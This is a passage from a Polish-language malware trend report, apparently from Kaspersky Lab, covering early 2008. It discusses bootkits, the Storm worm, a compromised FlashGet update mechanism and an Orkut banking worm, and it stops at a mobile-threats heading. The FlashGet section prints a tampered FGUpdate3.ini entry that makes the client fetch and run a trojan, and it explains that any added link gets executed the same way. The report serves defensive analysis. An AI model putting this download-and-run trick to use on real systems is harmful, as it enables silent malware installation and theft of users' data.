Stan zagrożeń w internecie znajduje się obecnie na poziomie standardowym. Nie występują duże epidemie a eksperci z Kaspersky Lab nie zanotowali żadnych poważnych incydentów związanych z bezpieczeństwem. Poziom zagrożenia: 1

Ewolucja szkodliwego oprogramowania: styczeń - marzec 2008


Alexander Gostev
Starszy analityk wirusów, Kaspersky Lab

Opublikowany kilka miesięcy temu coroczny raport na temat ewolucji szkodliwego oprogramowania w 2007 roku zawierał prognozy dotyczące ewolucji krajobrazu zagrożeń w 2008 roku. Teraz, gdy minęły trzy pierwsze miesiące roku, możemy zacząć wyciągać wstępne wnioski.

Niestety, jak często bywa w branży antywirusowej, wnioski są dość ponure. Nadal rośnie tempo, w jakim zwiększa się liczba szkodliwych programów - codziennie wykrywane są tysiące nowych wariantów. Jednocześnie szkodniki stają się coraz bardziej zaawansowane technicznie. Szkodliwi użytkownicy zmieniają wektory ataków, kierując swoją uwagę na słabiej chronione pliki, takie jak technologie Web 2.0 oraz urządzenia mobilne.

Nadal jesteśmy świadkami reinkarnacji starych koncepcji i technik, a ich implementacja na nowych poziomach zwiększa stopień zagrożenia. Przykładem może być infekowanie sektorów startowych na atakowanych maszynach, rozprzestrzenianie szkodliwych programów za pośrednictwem nośników przenośnych oraz infekowanie plików.

Wydaje się, że pierwszy kwartał 2008 roku przyniósł symboliczną, ale ostateczną śmierć starej szkoły pisania wirusów. Pod koniec lutego "legendarna" grupa 29A oficjalnie oświadczyła na swojej stronie, że przestaje istnieć.

agostev_q1_malware_0408_pic01s.pngenlarge.gif

Pod presją wzrastającej kryminalizacji świata wirusów z biznesu wycofali się autorzy takich szkodników, jak "Cap" (pierwszy makrowirus, który spowodował globalną epidemię), "Stream" (pierwszy wirus dla alternatywnych strumieni NTFS), "Donut" (pierwszy wirus dla platformy .NET), "Rugrat" (pierwszy wirus dla platformy Win64), mobilny wirus Cabir, Duts i wiele innych. Nikt już nie tworzy szkodliwych programów w celach badawczych, ani nie traktuje tego zajęcia jako sposobu na wyrażenie siebie - o wiele bardziej opłaca się stworzyć setki prymitywnych programów trojańskich, a następnie sprzedać je.

Rozwiązanie grupy 29A komentowały prawie wszystkie największe firmy antywirusowe: każda z nich rzuciła wirtualną grudkę ziemi na grób tej grupy, która w swoim czasie przysporzyła analitykom wirusów wiele problemów.

W poniższych rozdziałach zostały omówione trendy, które w 2008 roku zastąpiły "romantyczny" ideał pisania wirusów:

  1. Bootkit
  2. Robak Storm ciąg dalszy
  3. TrojanGet
  4. Kilka towarzyskich robaków
  5. Mobilne wieści

Bootkit

Na początku 2008 roku główny problem w branży antywirusowej stanowiły rootkity bootkit - rootkity z możliwością uruchamiania się z sektora startowego dowolnego urządzenia. Chociaż większość użytkowników nie zdaje sobie sprawy z wagi tego problemu i nie rozumie wysiłków czynionych w celu pokonania go, w najbliższej przyszłości temat ten może dotyczyć wszystkich nas.

Początek historii

Wszystko zaczęło się w listopadzie 2007 roku, albo już w 2005 roku. Żadna z tych dat nie jest jednak poprawna. Wybierzmy się w krótką podróż w przeszłość i przypomnijmy sobie, co zdarzyło się 22 lata temu, w 1986 roku.

Oto, jak wydarzenia z tego roku zostały opisane w Encyklopedii Wirusów VirusList.pl (http://www.viruslist.pl/encyclopedia.html?chapter=articles&id=4):

Wykryto pierwszą globalną epidemię wirusów na komputerach IBM. Wirus Brain, który infekował sektor startowy, zdołał praktycznie w ciągu miesięcy rozprzestrzenić się na całym świecie. Niemal całkowita ignorancja społeczności informatycznej w kwestiach ochrony antywirusowej przyczyniła się do odniesienia przez tego wirusa sukcesu. Liczne publikacje, jakie pojawiły się na ten temat w dziedzinie science-fiction, zamiast informować o zabezpieczeniach, zaostrzyły tylko wywołaną panikę.

Wirusa Brain napisał 19-letni pakistański programista Basit Farooq Alvi oraz jego brat Amjad. Wirus zawierał ciąg tekstowy z ich imionami, adresami i numerami telefonów. Autorzy wirusów, pracujący w dziale sprzedaży firmy zajmującej się oprogramowaniem komputerowym, chcieli rzekomo zmierzyć poziom piractwa w kraju. Działanie wirusa ograniczyło się do zainfekowania sektora startowego dysku i zmiany nazwy dysku na '© Brain'; wirus posiadał dodatkową funkcję i nie niszczył danych. Niestety bracia stracili kontrolę nad 'eksperymentem' i Brain rozprzestrzenił się na całym świecie.

Ciekawostką jest fakt, że Brain był również pierwszym 'ukrywającym się wirusem'. Po wykryciu próby odczytania zainfekowanego sektora wirus wyświetlał oryginalne, niezainfekowane dane.

W ten sposób wszystko się zaczęło. Przez ponad 10 lat wirusy sektora startowego stanowiły najbardziej rozpowszechniony typ szkodliwych programów.

Zasada działania tych wirusów jest stosunkowo prosta: wykorzystują one algorytmy, które uruchamiają system operacyjny w momencie włączenia lub powtórnego uruchomienia komputera. Program ładujący system czyta pierwszy fizyczny sektor dysku startowego (A:, C: lub napęd CD-ROM, w zależności od parametrów BIOS-u) i przekazuje do niego kontrolę. Jeżeli sektor startowy zawiera wirusa, wtedy przejmuje on kontrolę.

Znana jest tylko jedna metoda infekowania dyskietek: wirus zastępuje oryginalny kod sektora startowego własnym kodem. Dysk twardy może zostać zainfekowany na trzy różne sposoby - wirus zastępuje kod sektora MBR własnym kodem; zastępuje kod sektora startowego na dysku startowym (zwykle jest to C:) swoim własnym kodem lub modyfikuje adres aktywnego sektora startowego na tablicy partycji dysku zlokalizowanej w sektorze MBR dysku twardego.

W większości przypadków podczas infekowania dysku wirus przenosi oryginalny sektor startowy (lub MBR) na inny sektor dysku (na przykład pierwszy wolny).

Twórcy rozwiązań antywirusowych zaczęli dodawać mechanizmy ochrony mające na celu uniemożliwienie zapisywania do MBR-a. Pojawił się system Windows 95/98, dyskietki zaczęły wychodzić z użycia, a po prawie dekadzie wirusy sektora startowego zniknęły z krajobrazu zagrożeń, przechodząc do historii wirusologii.

Jednak na zorganizowanej w Stanach Zjednoczonych w 2005 roku konferencji Black Hat Derek Soeder i Ryan Permeh, dwóch naukowców z eEye Digital Security, zaprezentowali BootRoota. Technologia ta pozwalała na umieszczenie kodu w sektorze startowym dysku - kodu, który przechwytywał uruchamianie jądra Windowsa i uruchamiał backdoora, umożliwiając zdalne zarządzanie maszyną za pośrednictwem lokalnej sieci.

Praca ta przyciągnęła sporą uwagę. W styczniu 2006 roku John Hesman z Next-Generation Security Software ogłosił, że funkcje zarządzania zasilaniem komputera (tak zwany ACPI - Advanced Configuration and Power Interface) umożliwiają stworzenie programów implementujących funkcje rootkit, które mogą zostać zapisane do pamięci flash BIOS. Szkodliwy kod zapisany w takiej lokalizacji (BIOS) jest trudniejszy do wykrycia niż backdoor sektora startowego. Hesman stworzył również prototypowy kod, który umożliwia zwiększenie przywilejów systemowych i czytanie danych z pamięci komputera.

Rok później, pod koniec 2007 roku dwóch programistów, Nitin i Vipin Kumar, zaprezentowało Vbootkita - rootkita posiadającego funkcję umożliwiającą mu uruchamianie się z sektora startowego dowolnego urządzenia. Program może również działać w systemie Windows Vista. Kod źródłowy nie został upubliczniony, ale został przekazany niektórym firmom antywirusowym.

Główna zasada działania Vbootkita została pokazana poniżej:

BIOS --> kod Vbootkita (z CD, PXE itp.) --> MBR --> sektor startowy NT --> Menedżer rozruchu Windows --> Loader Windows --> Jądro systemu Vista.

Autorzy obiecali zaimplementować infekcję BIOS w kolejnej wersji bootkita.

Innymi słowy, to, co się wydarzyło, nie było żadną niespodzianką - stara technologia infekowania sektora startowego została połączona z modnym rootkitem. Mimo że obecnie prawie wszystkie firmy antywirusowe potrafią skanować sektor startowy dysków, nadal trudno jest wykryć, czy funkcje systemu zostały przechwycone lub zastąpione. Odnosi się to nawet do trojana oraz programu antywirusowego działających w jednym systemie operacyjnym.

To, co napisaliśmy, brzmi jak potencjalna mieszanka wybuchowa, która w każdej chwili może może eksplodować. Taki wybuch nastąpił w listopadzie 2007 roku, jednak wiadomość o nim pojawiła się trochę później, pod koniec grudnia, gdy kilka tysięcy użytkowników (nie ma dokładnych danych dotyczących liczby infekcji) padło ofiarą pierwszej szkodliwej implementacji bootkita.

Bootkit

Między 19 a 28 grudnia pojawiło się kilka stron internetowych, które stosowały ataki drive-by download (infekowanie maszyny poprzez umieszczenie exploitów na stronie internetowej, które następnie pobierały szkodliwy program). Szczegółowa analiza szkodliwego programu ujawniła kod ze zdolnością infekowania MBR-a oraz sektorów dysku twardego.

Po przedostaniu się do atakowanej maszyny szkodliwy kod modyfikuje MBR, zapisuje część będącą rootkitem na sektorze dysku, wypakowuje z siebie backdoora Windows, instaluje backdoora, a następnie usuwa się.

agostev_q1_malware_0408_pic04s_pl.pngenlarge.gif

Podczas infekowania MBR-a instrukcje przekazują kontrolę do głównej części rootkita, który jest umieszczony na kilku sektorach dysku twardego i nie jest reprezentowany jako pliki w systemie. Część ta monitoruje załadowany już system operacyjny Windows i podczas czytania ukrywa zainfekowany MBR oraz "brudne" sektory, przedstawiając w ich miejsce czyste. W tym celu przechwytuje i zastępuje funkcje systemu.

agostev_q1_malware_0408_pic05s_pl.pngenlarge.gif

Oprócz ukrywania swojej obecności w systemie szkodliwy kod instaluje backdoora w systemie Windows; backdoor kradnie dane użytkownika, łącznie z danymi dotyczącymi różnych systemów bankowości online.

Rekonstrukcja zdarzeń na podstawie wykrytych wariantów rootkitów, analiza zainfekowanych stron oraz kodu szkodliwego programu pobieranego z tych stron pokazała, że od listopada 2007 r. nieznani autorzy przygotowywali się do aktywowania swojego kodu na całym świecie. Kilka z pierwszych wariantów tego szkodliwego programu pochodzi z okresu między połową listopada a połową grudnia; są to wersje alfa zawierające poważne błędy w kodzie wskazujące na to, że autorzy szukali optymalnych wariantów.

Wypuszczony pod koniec grudnia kod był dość skuteczny. Szkodliwy program łączący funkcje bootkita i backdoora został sklasyfikowany przez nas jako Backdoor.Win32.Sinowal, jako że wiele z funkcji tego backdoora, jak również metoda wykorzystywana do "zaśmiecania" kodu były identyczne z tymi znanymi nam z trojana Trojan-PSW.Win32.Sinowal.

Mimo coraz większego wyrafinowania i wielu zaimplementowanych innowacji bootkit potrafi jedynie chronić samego siebie - przez co plik backdoora jest podatny na wykrycie i usunięcie. To oznacza, że za rozwojem bootkita i backdoora stały różne osoby, i wskazuje na to, że bootkit został stworzony przez Rosjan. Znane są przypadki współpracy twórców wirusów. Jednak sądząc z rezultatu w tym przypadku mieliśmy do czynienia raczej z wojownikiem, który pośpiesznie przywdział przekutą zbroję kogoś innego, ta jednak okazała się bezużyteczna.

Mimo to wydaje się, że bootkit jest samowystarczalną platformą - czymś, co można dodać do istniejącego szkodliwego programu w celu zabezpieczenia go i zamaskowania jego obecności w systemie. Być może w najbliższej przyszłości pojawią się bootkity na sprzedaż, przez co technologia ta będzie dostępna dla tysięcy dzieciaków skryptowych. Sądząc po tempie, w jakim wzrasta liczba szkodliwych programów, bootkit może stać się jednym z najbardziej rozpowszechnionych zagrożeń.

Ochrona przed bootkitami: problemy

Dlaczego ochrona przed bootkitami jest tak trudna? Problemy, jakie napotykamy tu, są następujące:

  1. Szkodliwy kod przejmuje kontrolę przed uruchamianiem systemu operacyjnego, a tym samym jest inicjowany jeszcze przed programem antywirusowym
  2. Z zainfekowanego systemu operacyjnego trudno jest wykryć przechwycenie funkcji
  3. Przywracanie przechwyconych funkcji może prowadzić do załamania się całego systemu operacyjnego
  4. Wyleczenie MBR-a możliwe jest tylko pod warunkiem wykrycia oryginalnego MBR-a

Naturalnie najlepszą ochroną jest w ogóle nie dopuścić do zainfekowania systemu - w końcu bootkit nie pojawia się znikąd. W jakiś sposób musi przedostać się do komputera. Niektóre programy antywirusowe potrafią zapobiec infekcji nawet nieznanych wariantów szkodliwego oprogramowania. Jednak zawsze istnieje możliwość, że szkodnik mimo wszystko przeniknie przez taką ochronę. Powstaje więc pytanie, w jaki sposób wyleczyć zainfekowaną już maszynę.

Istnieją dwie opcje - w systemie może być już zainstalowany program antywirusowy (w takim przypadku powyższe cztery punkty dotyczą rozwiązania antywirusowego) lub nie jest wykorzystywane żadne oprogramowanie antywirusowe i należy je zainstalować. W drugim przypadku napotykamy dodatkowy problem związany z tym, który został opisany w punkcie 1; szkodliwy kod może blokować próby zainstalowania rozwiązania antywirusowego w zainfekowanym systemie.

Twórcy wirusów przeanalizowali sposoby rozwiązywania przez firmy antywirusowe opisanych wyżej problemów i w lutym 2008 r. pojawiła się nowa, ulepszona wersja bootkita. Wszystkie wcześniejsze metody zwalczania bootkitów okazały się bezużyteczne.

Jednocześnie bootkit zaczął rozprzestrzeniać się na nowe sposoby. Na wielu europejskich stronach, zaatakowanych przez hakerów, zostały wykryte odsyłacze do stron zawierających exploity instalujące bootkita.

Jak dotąd oprócz Sinowala nie wykryliśmy żadnego innego szkodliwego programu wyposażonego w bootkita. Obecnie między firmami antywirusowymi a twórcami wirusów panuje sytuacja patowa, która nastąpiła po klasycznej sekwencji ataku i kontrataku. Nawet najnowsze warianty bootkita mogą być zwalczane bez konieczności zaimplementowania w rozwiązaniach antywirusowych znacznych innowacji.

Jednak nie ma wątpliwości, że wcześniej czy później tylko jedna metoda będzie gwarantowała wykrywanie i usuwanie takich szkodliwych programów. Jednak będzie to wymagało przejścia z ochrony za pomocą oprogramowania na ochronę za pomocą sprzętu.

Kluczowym pytaniem jest: co pierwsze przejmie kontrolę - jeśli będzie to wirus, wtedy rozwiązanie antywirusowe stanie się bezużyteczne.

Tak więc wirusy po raz kolejny zaczęły wykorzystywać MBR. 10 lat temu rozwiązaliśmy ten problem z pomocą dysku rozruchowego wyposażonego w oprogramowanie antywirusowe. Być może nadchodzi czas powrotu nie tylko starych technologii wirusowych ale również starych technologii antywirusowych.

Robak Storm ciąg dalszy

W połowie stycznia 2008 roku mieliśmy pierwszą rocznicę pojawienia się pierwszych próbek robaka, znanego na całym świecie jako Zhelatin, Nuwar lub Storm Worm. Do tego czasu wirusologia komputerowa nie znała przypadku tak szybko ewoluującego szkodliwego programu.

Zhelatin wykorzystywał i rozwijał koncepcje zaimplementowane w robakach Bagle i Warezov. Szkodnik zapożyczył swoją strukturę modularną od Bagle'a, a w często wypuszczanych nowych wariantach wzorował się na Warezovie. Podobnie jak Warezov w celu rozprzestrzeniania szkodliwego kodu zamiast masowo rozsyłać główny komponent za pośrednictwem poczty elektronicznej wykorzystywał setki zainfekowanych stron, Skype'a i inne komunikatory internetowe. Oprócz tego wykorzystywał socjotechnikę, technologię rootkit, kontrataki na firmy antywirusowe oraz zdecentralizowany botnet. W ciągu niecałego roku, z powodu swojego niemalże mitycznego botnetu, Storm Worm stał się głównym problemem branży bezpieczeństwa informatycznego.

Dokładne rozmiary botnetu robaka Storm pozostają tajemnicą. W 2007 roku pojawiły dość rozbieżne szacunki dotyczące liczby zainfekowanych maszyn. Na przykład we wrześniu niektórzy eksperci szacowali, że botnet składa się z 2 milionów maszyn; inni mówili o przedziale od 250 000 do jednego miliona, według trzeciej grupy, botnet składał się z 150 000 maszyn. Byli również tacy którzy, szacowali, że botnet składa się z 50 milionów zainfekowanych komputerów! Nie trudno domyślić się, skąd tak duża rozbieżność - z powodu zdecentralizowanej natury tego botnetu nie jest możliwe określenie dokładnej liczby maszyn zombie. Szacunki mogą być oparte jedynie na niebezpośrednich wskaźnikach, które naturalnie są dyskusyjne.

Niezależnie od jego rozmiarów nie ulega wątpliwości, że botnet Storm istniał. Był jednak nieaktywny. Nie wykryto "klasycznej" aktywności botnetu; nie był wykorzystywany do masowej wysyłki lub do przeprowadzania ataków DDoS (co nie wyklucza, że botnet został stworzony przez cyberprzestępcę w celach przestępczych). Wyglądało na to, że botnet nie wykonywał żadnej funkcji poza rozprzestrzenianiem robaka Storm (dokonywał tego rozsyłając nowe wiadomości zawierające odsyłacze do zainfekowanych stron, a następnie umieszczając moduły na zainfekowanych maszynach, które następnie były pobierane na nowe komputery). Nie było jasne, w jakim celu stworzono botnet: czyżby sztuka dla sztuki? Coś takiego jednak się nie zdarza - stworzenie i utrzymanie botnetów wymaga zbyt wielu zasobów.

Około października 2007 roku częstotliwość masowych wysyłek przeprowadzanych przez Zhelatina zaczęła zmniejszać się. Eksperci, którzy wcześniej mówili o milionach zainfekowanych maszyn, zaczęli teraz szacować rozmiar botnetu na 150 000 - 200 000 komputerów. Podejrzewano, że botnet miał być sprzedany w częściach. Mniej więcej w tym samym czasie wykryto pierwsze masowe wysyłki spamu z komputerów zainfekowanych robakiem Storm. Nie można było jednak jednoznacznie stwierdzić, że spam był rozsyłany za pośrednictwem botnetu, a nie innych szkodliwych programów, które mogły znajdować się na zaatakowanych maszynach.

Koniec 2007 roku i pierwsze miesiące 2008 roku dały odpowiedź na pytanie, co działo się z robakiem Storm.

Robak ten wypłynął na nowo w święta Bożego Narodzenia. Botnet zaczął rozsyłać miliony wiadomości o takich tytułach, jak: "Find Some Christmas Tail", "Warm up this Christmas" oraz "Mrs. Clause Is Out Tonight!". Celem tych wiadomości było zwabienie użytkownika na stronę merrychristmasdude.com zawierającą exploity, które przeprowadzały ataki drive-by download zapewniające przedostanie się robaka Storm na atakowane maszyny. Merrychristmasdude.com nie była pojedynczą stroną internetową, której zamknięcie mogło zatrzymać infekcję. Zhelatin stosował fast-flux, technikę zmieniania adresów DNS, która polega na nieustannej zmianie lokalizacji strony, która może mieścić się na jednym z ponad tysiąca specjalnie przygotowanych komputerów.

Podobne ataki trwały przez kilka następnych dni, aż do 15 stycznia. Jednak niespodziewanie wydarzyło się coś dziwnego. Na skutek żartu lub błędu autorów szkodliwych programów botnet zaczął rozsyłać wiadomości zawierające kartki walentynkowe, mimo że 14 lutego był dopiero za miesiąc.

agostev_q1_malware_0408_pic06s.pngenlarge.gif

Wiadomości spamowe opatrzone były takimi tytułami jak: "Sent with Love", "Our Love is Strong", "Your Love Has Opened" itp. Naturalnie kierowały użytkownika na aktualnie wykorzystywaną stronę fast-flux.

Styczniowe masowe wysyłki zostały przeprowadzone na większą skalę i były bardziej natrętne niż te z drugiej połowy 2007 r. Były to również największe masowe wysyłki, jakie przeprowadzono w pierwszym kwartale 2008 roku. Autorzy Zhelatina wymierzyli serię ciosów, aby przywrócić botnet do jego pierwotnego rozmiaru lub nawet powiększyć go. Komputery zainfekowane Zhelatinem zaczęły być wykorzystywane do przeprowadzania ataków DoS. MessageLabs zaczął szacować, że z pomocą botnetu robaka Storm rozesłane zostało prawie 20% krążącego spamu.

Mniej więcej w tym samym czasie Fortinet stwierdził, że botnet wykorzystywany był do przeprowadzania ataków na banki Barclays i Halifax. Jeżeli tak było w rzeczywistości, byłby to pierwszy przypadek wykorzystania botnetu robaka Storm do klasycznych celów cyberprzestępczych.

Jednocześnie wraz ze wzrostem aktywności robaka Storm mówiło się o konieczności schwytania i ukarania jego autorów. Jednak eksperci nie mogli zgodzić się nawet co do narodowości osób odpowiedzialnych za stworzenie tego robaka.

Obecnie dominują dwa punkty widzenia. Dmitry Alperovitch z Secure Computing uważa, że botnet stworzył Rosjanin. Alperovitch wykazał podobieństwa między niesławną organizacją Russian Business Network (RBN) a autorami exploitów Mpack. Wielu ekspertów popiera pogląd o rosyjskim pochodzeniu robaka.

Inni uważali, że robak Storm został stworzony przez Amerykanów. Za argumentem tym przemawia fakt, że podczas stosowania socjotechniki jego autorzy wykazali się podejrzanie dobrą znajomością amerykańskiego stylu życia i psychologii. W masowych wysyłkach odwoływano się do konkretnych incydentów i zdarzeń, szczególnie ważnych dla Amerykanów. Zdarzenia te mogły być zupełnie obce dla twórców wirusów z innych państw, w szczególności dla Rosjan.

Nie posiadamy informacji na poparcie żadnego z tych punktów widzenia. Według największego prawdopodobieństwa, za aktywnością tą stoi międzynarodowa grupa posiadająca wyraźny podział obowiązków. Ktoś tworzy robaka; ktoś inny jest odpowiedzialny za masowe wysyłki; jeszcze inna osoba umieszcza robaka na zainfekowanych stronach; kolejna włamuje się na strony; jeszcze inna rozprzestrzenia szkodliwy program za pośrednictwem komunikatorów internetowych, następna zajmuje się tworzeniem exploitów.

Rozpowszechnienie robaka Storm oraz wykorzystywane wektory ataków są zbyt szerokie, aby był on dziełem jednej, dwóch lub nawet trzech osób. Jeżeli nasze przypuszczenia są słuszne, robak Storm to podręcznikowy przykład współczesnej cyberprzestępczości wraz z jej międzynarodowym podziałem pracy. Wciąż jednak nie wiemy, w jaki sposób cyberprzestępcy zarabiają na nim pieniądze.

Gdy wciąż poszukiwaliśmy odpowiedzi na pytania, jakie pojawiły się w związku z robakiem Storm, pod koniec marca jego autorzy rozesłali ostatnią falę wiadomości. Okazją był 1 kwietnia, dzień znany w całych Stanach Zjednoczonych, Europie i Rosji jako Prima Aprilis.

Pozostaje pytanie: kto będzie śmiał się ostatni?

agostev_q1_malware_0408_pic07.png

TrojanGet

Przypadki rozprzestrzeniania infekcji przez legalne programy i firmy antywirusowe, choć stosunkowo rzadkie, zdarzają się jednak w świecie bezpieczeństwa informatycznego. Obejmują one rożne przypadki - od zainfekowanych pakietów instalacyjnych po zainfekowane dokumenty rozsyłane klientom i partnerom.

Każdy taki incydent ma poważny wpływ na reputację firmy antywirusowej lub firmy, która została dotknięta takim incydentem. Wpływa na użytkowników, którzy przestrzegają podstawowych reguł bezpieczeństwa komputerowego i stwarza problemy firmom antywirusowym, które traktują legalne oprogramowanie oraz źródła, z jakich pochodzi, jako godne zaufania.

Pierwszy kwartał 2008 roku przyniósł najnowszy przypadek tego rodzaju.

Na początku marca analitycy z firmy Kaspersky Lab otrzymali wiadomości od użytkowników, w których informowali firmę, że katalog popularnego klienta FlashGet zawierał trojana. Analiza pokazała, że problem ten dotknął użytkowników z całego świata. Do symptomów infekcji należało pojawienie się w systemie plików o nazwie inapp4.exe, inapp5.exe oraz inapp6.exe. Kaspersky Anti-Virus wykrywał te pliki jako Trojan-Dropper.Win32.Agent.exo, Trojan-Dropper.Win32.Agent.ezo oraz Trojan-Downloader.Win32.Agent.kht.

Sytuacja była dziwna: nie wykryto żadnego innego trojana, który mógł umieścić tego trojana w systemie. Niektóre z ofiar posiadały w pełni załatane systemy operacyjne i przeglądarki. Zatem w jaki sposób szkodniki te zdołały przeniknąć do zainfekowanych maszyn?

Naszą uwagę przykuła lokalizacja trojanów - w katalogu FlashGet. Szybko okazało się, że oprócz obecności plików trojana niedawno stworzono i zmodyfikowano plik FGUpdate3.ini (niebieski tekst pokazuje różnice w stosunku do pierwotnego pliku):

[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031
[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%
[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%

Odsyłacz do inapp4.exe (pliku trojana) prowadził do prawdziwej strony FlashGet: trojan pobierał z tej strony plik o nazwie appA.cab.

Nie pojawiły się żadne informacje na temat incydentu na stronie FlashGet. Wystarczyło jednak spojrzeć na forum, aby znaleźć wiele wpisów na temat infekcji oraz o tym, że autorzy milczeli na ten temat.

Z informacji znalezionych w Internecie wynikało, że pierwsze przypadki infekcji zostały wykryte już 29 lutego. Najnowsza infekcja, o jakiej wiedzieliśmy w tym czasie, miała miejsce 9 marca. Przez 10 dni legalny program działał jak trojan downloader instalując i uruchamiając na atakowanych maszynach trojany umieszczone na stronie autorów.

Mogło wydawać się, że incydent znalazł swój koniec - gdy publikowaliśmy o nim informacje, trojan został już usunięty ze strony, a plik FGUpdate3.ini (który również jest pobierany z Internetu) przywrócony do pierwotnego stanu. Jednak w ciągu niecałych dwóch tygodni, 22 marca Steve Bass, redaktor popularnego magazynu PC World, wykrył w swoim katalogu FlashGet trojana o nazwie Trojan-Downloader.Win32.Agent.kht. Wyglądało to na powtórkę z historii - szkodliwy kod rozprzestrzeniany był zarówno ze strony FlashGet, jak i przez sam program.

FlashGet mógł zostać zmieniony w trojana downloadera na jeden z dwóch sposobów.

Pierwszy jest najbardziej oczywisty - ktoś włamał się na stronę. W rezultacie szkodliwy użytkownik mógł zastąpić standardowy plik konfiguracyjny plikiem, który prowadził do trojana umieszczonego na tej stronie. Nie wiemy, dlaczego hakerzy nie wykorzystali innej strony - być może uznali, że najlepszym ukryciem będzie umieszczenie na widoku (np. odsyłacz do pliku FlashGet w pliku konfiguracyjnym nie wzbudziłby podejrzeń).

Postanowiliśmy sprawdzić, czy za pomocą tego triku można pobrać inne pliki z innych stron. Okazało się, że tak. Wystarczy tylko dodać odsyłacz do pliku FGUpdate3.ini. Odsyłacz może prowadzić do czegokolwiek - po każdym uruchomieniu FlashGeta zostanie to automatycznie pobrane i uruchomione na komputerze. Nawet jeśli nie wciśniesz "Odśwież", FlashGet wykorzysta informacje z pliku .ini.

"Luka" ta dotyczy wszystkich wersji menedżera FlashGet 1.9.xx. To oznacza, że chociaż strona FlashGeta została przywrócona do stanu sprzed włamania się hakerów, nadal istnieje luka w systemie użytkownika. Trojan potrafi modyfikować lokalny plik .ini FlashGet, przez co działa jak trojan downloader. To właśnie druga ze wspomnianych metod.

Nie trzeba chyba podkreślać, że FlashGet jest zwykle traktowany jako aplikacja zaufana i każda aktywność sieciowa wygenerowana przez ten program jest uważana za legalną.

Do tej pory nie było żadnej oficjalnej reakcji ze strony chińskiej firmy, która tworzy program FlashGet. Prawdziwa przyczyna incydentu pozostaje nieznana, nie ma również gwarancji, że sytuacja nie powtórzy się.

Firmy antywirusowe, które same mogą zdecydować, czy FlashGet jest potencjalnie szkodliwy, zaczęły klasyfikować go jako riskware. I miały po temu wiele powodów.

Kilka towarzyskich robaków

W naszym rocznym raporcie pisaliśmy o zagrożeniu, jakie stanowią portale społecznościowe. Przewidywaliśmy wtedy, że w 2008 roku portale społecznościowe staną się głównym celem ataków phishingowych. Wzrośnie zapotrzebowanie szkodliwych użytkowników na dane dotyczące kont w takich serwisach jak Facebook, MySpace, LiveJournal, Blogger i innych. Będzie to niebezpieczna alternatywa umieszczania szkodliwych programów na zhakowanych stronach. W 2008 roku wiele trojanów będzie rozprzestrzeniało się za pośrednictwem kont użytkowników na serwisach społecznościowych, na ich blogach i profilach.

W lutym 2008 roku przewidywania te spełniły się całkowicie. Po raz kolejny zaatakowany został Orkut, popularny portal społecznościowy należący do Google.

Orkut jest niezwykle popularny w wielu państwach na całym świecie, zwłaszcza w Brazylii i Indiach. Według danych dostarczonych przez Alexa.com, 67% zapytań do Orkuta pochodzi z Brazylii, a ponad 15% z Indii.

Przez ostatnie kilka lat Brazylia uważana była za jedno z najbardziej zawirusowanych państw na świecie. Brazylijscy twórcy wirusów znani są z tysięcy różnych trojanów, jakie stworzyli w celu kradzieży danych użytkownika dotyczących kont bankowych. Rodziny Bancon, Banpaes i Banload prawie w 100% składają się z trojanów rozwiniętych w Ameryce Południowej.

Bankowość online jest niezwykle popularna w Brazylii. Podobnie jak Orkut. Ponadto w Brazylii jest wielu twórców wirusów. Te trzy czynniki w połączeniu dają następujący rezultat: pojawienie się robaka, który rozprzestrzenia się za pośrednictwem Orkuta i kradnie dane dotyczące kont w systemach bankowości online.

Z wszystkich portali społecznościowych Orkut posiada najdłuższą listę szkodliwych programów, które go atakują. W 2006 i 2007 roku portal ten padł ofiarą epidemii wirusów, a w latach 2005-2007 wykrywano w nim wiele luk w zabezpieczeniach i był celem ataków hakerów. Ostatnim nagłośnionym incydentem było pojawienie się w grudniu 2007 r. robaka skryptowego, który zainfekował ponad 700 000 użytkowników.

Zaledwie dwa miesiące później, w lutym 2008 roku wybuchła nowa epidemia. Tym razem hakerzy nie zadawali sobie trudu szukaniem czy wykorzystywaniem luk XSS na portalu Orkut. Nowy robak działał według stosunkowo prostych zasad:

  1. Użytkownik otrzymuje wiadomość od jednego ze swoich kontaktów. Wiadomość zawiera zdjęcie pornograficzne w formacie flash movie.
  2. Po kliknięciu tego zdjęcia zostanie przekierowany na zainfekowaną stronę.
  3. Użytkownik jest pytany, czy chce zainstalować aplikację do odtwarzania formatów Flash, która w rzeczywistości jest trojanem.
  4. Po tym, jak trojan zostanie pobrany i uruchomiony, będzie pobierał inne komponenty trojana na zaatakowany komputer za pośrednictwem Internetu.
  5. Konto użytkownika jest następnie wykorzystywane do tworzenia nowych wiadomości, zgodnie z punktem 1.
  6. Szkodliwy moduł śledzi wykorzystywanie przez użytkownika portalu Orkut.
  7. Inne moduły przechwytują dane, które użytkownik wprowadza z klawiatury podczas korzystania z brazylijskich systemów bankowości online.

Nie jest możliwe określenie dokładnej liczby ofiar, jednak nasi koledzy z Symanteca szacują, że ucierpiało co najmniej 13 000 użytkowników.

Incydent ten po raz kolejny pokazuje, jak bardzo podatni na ataki mogą być użytkownicy portali społecznościowych. Czynniki, które sprawiają, że serwisy Web 2.0 są popularne zarówno wśród użytkowników, jak i hakerów, zostały wymienione poniżej:

  1. Migracja danych użytkownika z komputera PC do Internetu
  2. Możliwość uzyskania dostępu do wielu różnych serwisów z jednego konta
  3. Szczegółowe informacje o użytkowniku
  4. Informacje o kontaktach i znajomych użytkownika
  5. Miejsce, w którym można opublikować dowolną treść
  6. Zaufanie między kontaktami

Problem już teraz jest dość poważny i wiele wskazuje na to, że będzie stanowił realne zagrożenie dla bezpieczeństwa informatycznego. W niedalekiej przyszłości opublikujemy artykuł poświęcony temu tematowi.

Wieści mobilne

W pierwszym kwartale 2008 roku świat mobilnej wirusologii obfitował w wiele wydarzeń. Obserwowaliśmy nie tylko dalszy rozwój technologii, ale również wzrost liczby osób zaangażowanych na tym polu: zarówno twórców wirusów, jak i firm antywirusowych. Innowacje w zakresie szkodliwego kodu rozłożyły się mniej więcej równomiernie na cztery cele: Symbiana, Windows Mobile'a, J2ME oraz iPhone'a.

Symbian

